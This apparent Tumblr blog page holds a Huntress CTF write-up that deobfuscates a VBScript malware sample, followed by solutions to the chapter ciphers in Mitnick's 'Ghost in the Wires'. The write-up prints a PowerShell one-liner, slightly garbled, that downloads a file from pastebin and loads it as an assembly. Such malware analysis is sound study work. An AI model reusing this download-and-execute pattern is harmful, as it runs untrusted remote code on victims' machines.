zeropegasus
Cybersecurity Journal
2 posts
добро пожаловать
Don't wanna be here? Send us removal request.
zeropegasus · 1 year ago
Text
Tumblr media Tumblr media
Huntress CTF (VeeBeeEes)
The malware file you are given to inspect is called veebeeeee, a Visual Basic Script file.
Cyberchef has a tool called Microsoft Script Decoder
When you upload the veebeeeee file to cyberchef and use the decoder, you get the output in the screenshots.
Taking out all the ', al37ysoeopm'al37ysoeopm and " " makes things much easier to see
We can see there are methods:
Power = Power0 + Power1 + Power2 + Power3 + Power4 + Power5
Path   = Path0 + Path1 + Path2 + Path3 + Path4 + Path5
Reqest = Reqest0 + Reqest1 + Reqest2 +  Reqest3 + Reqest4 + Reqest5
InvokeReqest = InvokeReqest0 + InvokeReqest1 + InvokeReqest2 + InvokeReqest3 + InvokeReqest4 + InvokeReqest5
ExecAssem   = ExecAssem0 + ExecAssem1 + ExecAssem2 + ExecAssem3 + ExecAssem4 + ExecAssem5
And finally:
CollectThenReplace Power , Path , Reqest , InvokeReqest , ExecAssem
Once you concatenate all the values you get:
PowerShell$f='C:\Users\Public\Documents\July.htm'; if (!(Test-Path $f)){Invoke-WebRequest 'https://pastebin.com/raw/SiYGwwcz' -outfile $f  }; [System.Reflection.Assembly]::loadfy]::loadfile($f); [WorkAreaWork]:Exe()
Flag is contained in https://pastebin.com/raw/SiYGwwcz
3 notes · View notes
zeropegasus · 1 year ago
Text
Kevin Mitnick's "Ghost in The Wires" Solved Ciphers
Chapter 1: Rough Start
Cipher: Max vhlm hy max unl wkboxk B nlxw mh ingva fr hpg mktglyxkl (ROT13 with shift 7)
Solution: The cost of the bus driver I used to punch my own transfers
Answer: $15
Chapter 2: Just Visiting
Cipher: Estd mzzv esle elfrse xp szh ez ncplep yph topyetetpd hspy T hld l acp-eppy
Solution: This book taught me how to create new identifies when I was a pre-teen (ROT13 shift 15)
Answer: The Paper Trip by Barry Reid
Chapter 3: Original Sin
Cipher: pbzfsobp dkfobtpkx lq pbkfi ppbkfpry aoxtolc iixz lq abpr bobt pbzfsba cl bmvq obail bpbeQ
Solution: These older type of devices were used to call forward business lines to answering services (ROT13 shift 29 && reversed)
Answer: Diverter
Chapter 4: Escape Artist
Cipher: gsvmznvlugsvnzrmuiznvhrszxpvwzgfhxrmgsvzikzmvgwzbh
Solution: thenamesofthemainframesihackedatuscinthearpanetdays (Atbash Cipher)
Answer: COSMOS
Chapter 5: All Your Phone Lines Belong To Me
Cipher: jbi ujt veo eco ntk iwa lhc eeo anu uir trs hae oni rfn irt toh imi ets shs !eu
Solution: I took a course on this subject when I ran from the juvenile authorities! (Caesar Box cipher, moved words around)
Answer: Criminal Justice
Chapter 6: Will Hack for Love
Cipher: bmFtZXRoZWNvbXBhbnl3aGVyZWJvbm5pZXdhc2VtcGxveWVkd2hlbndlc3RhcnRlZGRhdGluZw==
Solution: namethecompanywherebonniewasemployedwhenwestarteddating (Base 64)
Answer: GTE
Chapter 7: Hitched in Haste
Cipher: multbqncannqenabrhfgacnqogehchetbkkebmsqgkncchebr
Solution: numberofdoorcodesihadforpacificbellcentraloffices (GTEABCDFHIJKLMNOPQRSUVWXYZ, GTE was the answer to the previous question, since we put GTE in the beginning we remove those letters from where they normally are in the alphabet so there isn't overlap)
Answer: 11
Chapter 8: Lex Luthor
Cipher: 'siass nuhmil sowsra amnapi waagoc ifiniti dscisf iiiesf ahgbao staetn itmlro
Solution: "I said I wasn't this famous magician while being a smart ass to prison officials" (Write each word down a list and follow the list from bottom left and up to the right)
Answer: David Copperfield
Chapter 9: The Kevin Mitnick Discount Plan
Cipher: tvifafwawehes hsesoonvtlimaeloemtcagmen irnoerrldony
Solution:
Answer:
Chapter 10: Mystery Hacker
Cipher: gnkusr ooursnsisti ttnotoihiec rolwaintmlk ovtgp
Solution:
Answer:
Chapter 11: Foul Play
Cipher: ow gw ty kc qb eb nm ht ud pc iy ty ik tu zo dp gl qt hd
Solution:
Answer
11 notes · View notes